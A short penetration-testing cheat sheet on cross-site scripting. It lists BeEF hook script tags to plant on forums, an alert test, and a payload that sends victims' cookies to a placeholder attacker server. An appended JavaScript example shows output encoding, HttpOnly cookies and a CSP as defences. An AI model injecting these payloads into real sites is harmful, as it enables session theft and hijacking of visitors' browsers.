XSS – Cross Site Scripting
BeEF Framework
BeEF is a browser exploitation framework and is native in Kali.
From the vulnerable website, insert the JavaScript below to connect to the BeEF hook on the attack host.
As XSS is a client-side attack, this is most useful on persistent / stored XSS, e.g. message boards, forums.
4 examples:
    <script type=text/javascript src=http://10.10.xx.xx:3000/hook.js></script>
    <script>window.location="http://10.10.xx.xx:3000/hook.js"</script>
    <script type="text/javascript" src=" http://10.10.xx.xx:3000/hook.js "></script>
    <script src="http://10.10.xx.xx:3000/hook.js"></script>
XSS Examples
Test for reflected XSS.
    <script>alert("XSS")</script>
Display / write out cookies.
    <script>alert(document.cookie)</script>
Drop the user's cookies on the attacker's web service.
    <script>window.location='https://webserver/ghostface/?cookie='+document.cookie</script>
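Defensive counterpart to the payloads above, as an added example that is not part of the original page: output encoding for stored posts, an HttpOnly session cookie so document.cookie no longer exposes it, and a CSP that refuses inline scripts and scripts from other hosts such as a remote hook.js. All function names and the sample posts are hypothetical and constructed for illustration.

```javascript
// Added example, not from the original page. Function names are hypothetical.

// Encode the characters that let text break out of an HTML text or attribute context.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Render a stored forum post. Author and body are untrusted, so both are encoded on output.
function renderPost(post) {
  return `<article><h3>${escapeHtml(post.author)}</h3><p>${escapeHtml(post.body)}</p></article>`;
}

// Session cookie flags: HttpOnly hides the cookie from document.cookie,
// Secure restricts it to HTTPS, SameSite=Lax limits cross-site sends.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// CSP allowing scripts only from the site's own origin. Without 'unsafe-inline',
// inline <script> blocks are refused, as are scripts loaded from another host.
function cspHeader() {
  return "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'";
}

// Headers a response carrying rendered posts would send (sessionId is a constructed value).
function responseHeaders(sessionId) {
  return {
    "Content-Security-Policy": cspHeader(),
    "Set-Cookie": sessionCookieHeader("sid", sessionId),
  };
}

// Constructed sample posts using the payload shapes listed on this page.
const samplePosts = [
  { author: "guest", body: "<script>alert(document.cookie)</script>" },
  { author: "guest", body: '<script src="http://10.10.xx.xx:3000/hook.js"></script>' },
];

const renderedPosts = samplePosts.map(renderPost);
console.log(renderedPosts.join("\n"));
console.log(responseHeaders("abc 123"));
```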